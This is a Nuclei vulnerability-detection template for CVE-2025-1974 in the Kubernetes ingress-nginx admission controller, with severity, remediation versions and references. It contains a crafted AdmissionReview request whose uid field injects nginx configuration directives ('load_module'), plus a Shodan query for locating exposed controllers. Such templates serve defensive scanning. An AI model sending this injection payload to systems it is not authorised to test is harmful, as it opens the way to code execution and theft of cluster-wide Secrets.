id: CVE-2025-1974

info:
  name: Ingress-Nginx Controller - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch,UNC1739
  severity: critical
  description: |
    A security issue was discovered in Kubernetes where under certain conditions, an unauthenticated attacker with access to the pod network can achieve arbitrary code execution in the context of the ingress-nginx controller. This can lead to disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)
  impact: |
    Vulnerable versions of Ingress-Nginx controller can be exploited to gain unauthorized access to all secrets across namespaces in the Kubernetes cluster, potentially leading to complete cluster takeover.
  remediation: |
    Update to one of the following versions: Version 1.12.1 or later / Version 1.11.5 or later
  reference:
    - https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
    - https://projectdiscovery.io/blog/ingressnightmare-unauth-rce-in-ingress-nginx
    - https://nvd.nist.gov/vuln/detail/CVE-2025-1974
    - https://github.com/kubernetes/kubernetes/issues/131009
    - https://github.com/eeeeeeeeee-code/POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-1974
    cwe-id: CWE-653
    epss-score: 0.9113
    epss-percentile: 0.99662
  metadata:
    verified: true
    max-request: 1
    shodan-query: ssl:"ingress-nginx" port:8443
  tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s,vuln

variables:
  string: "{{to_lower('{{randstr}}')}}"

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "kind": "AdmissionReview",
          "apiVersion": "admission.k8s.io/v1",
          "request": {
            "uid": "{{string}}",
            "kind": {
              "group": "networking.k8s.io",
              "version": "v1",
              "kind": "Ingress"
            },
            "resource": {
              "group": "networking.k8s.io",
              "version": "v1",
              "resource": "ingresses"
            },
            "requestKind": {
              "group": "networking.k8s.io",
              "version": "v1",
              "kind": "Ingress"
            },
            "requestResource": {
              "group": "networking.k8s.io",
              "version": "v1",
              "resource": "ingresses"
            },
            "name": "test-{{randstr}}",
            "namespace": "default",
            "operation": "CREATE",
            "userInfo": {
              "uid": "{{string}}"
            },
            "object": {
              "kind": "Ingress",
              "apiVersion": "networking.k8s.io/v1",
              "metadata": {
                "name": "test-{{randstr}}",
                "namespace": "default",
                "creationTimestamp": null,
                "uid": "InjectTest#;\n\n}\n}\n}\nload_module test;",
                "annotations": {
                  "nginx.ingress.kubernetes.io/mirror-target": "fake-mirror-target"
                }
              },
              "spec": {
                "ingressClassName": "nginx",
                "rules": [
                  {
                    "host": "test.example.com",
                    "http": {
                      "paths": [
                        {
                          "path": "/",
                          "pathType": "Prefix",
                          "backend": {
                            "service": {
                              "name": "kubernetes",
                              "port": {
                                "number": 443
                              }
                            }
                          }
                        }
                      ]
                    }
                  }
                ]
              },
              "status": {
                "loadBalancer": {}
              }
            },
            "oldObject": null,
            "dryRun": true,
            "options": {
              "kind": "CreateOptions",
              "apiVersion": "meta.k8s.io/v1"
            }
          }
        }

    matchers:
      - type: word
        part: body
        words:
          - 'AdmissionReview'
          - 'load_module'
          - 'directive is specified too late'
        condition: and
# digest: 4a0a00473045022100fcb81f24967bd06062fcc0f6c8bca3930b04d97a8dcadf22241dd78afcb723e602200e546424b01f94a942d94142a03f050b8e07ef6177a89e512bf93096b8eca835:922c64590222798bb761d5b6d8e72950